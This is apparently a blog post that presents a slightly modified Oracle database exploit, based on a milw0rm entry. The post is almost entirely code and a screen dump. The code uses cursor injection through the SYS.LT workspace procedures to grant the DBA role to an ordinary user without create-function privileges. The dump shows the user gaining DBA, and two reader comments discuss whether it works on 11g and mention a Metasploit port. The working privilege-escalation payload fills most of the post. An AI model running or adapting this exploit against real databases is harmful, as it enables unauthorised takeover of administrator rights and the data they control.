This is slightly modified version of: http://milw0rm.com/exploits/7677
This is based on cursor injection and here you do not need create function privileges:
——
DECLARE
D NUMBER;
BEGIN
D := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(D,’declare pragma autonomous_transaction; begin execute immediate ”grant dba to scott”;commit;end;’,0);
SYS.LT.CREATEWORKSPACE(‘a”and dbms_sql.execute(‘||D||’)=1–‘);
SYS.LT.COMPRESSWORKSPACETREE(‘a”and dbms_sql.execute(‘||D||’)=1–‘);
end;
#———–screen dump—————————————————#
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
—————————— —————————— — — —
SCOTT CONNECT NO YES NO
SCOTT EXECUTE_CATALOG_ROLE NO YES NO
SCOTT RESOURCE NO YES NO
SQL> DECLARE
2 D NUMBER;
3 BEGIN
4 D := DBMS_SQL.OPEN_CURSOR;
5 DBMS_SQL.PARSE(D,’declare pragma autonomous_transaction; begin execute immediate ”grant dba to scott”;commit;end;’,0);
6 SYS.LT.CREATEWORKSPACE(‘a”and dbms_sql.execute(‘||D||’)=1–‘);
7 SYS.LT.COMPRESSWORKSPACETREE(‘a”and dbms_sql.execute(‘||D||’)=1–‘);
8 end;
9
10
11 /
DECLARE
*
ERROR at line 1:
ORA-01403: no data found
ORA-06512: at “SYS.LT”, line 6118
ORA-06512: at “SYS.LT”, line 6087
ORA-06512: at line 7
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
—————————— —————————— — — —
SCOTT CONNECT NO YES NO
SCOTT DBA NO YES NO
SCOTT EXECUTE_CATALOG_ROLE NO YES NO
SCOTT RESOURCE NO YES NO
—
Comments
2 Comments
Nice one. Of course, it does not work with 11g because dbms_sql now checks before executing that the privileges did not change from the parse stage.
Slavik
ported to MSF for the defcon release!
is the regular create procedure version of this working on 11 for you?
Trackback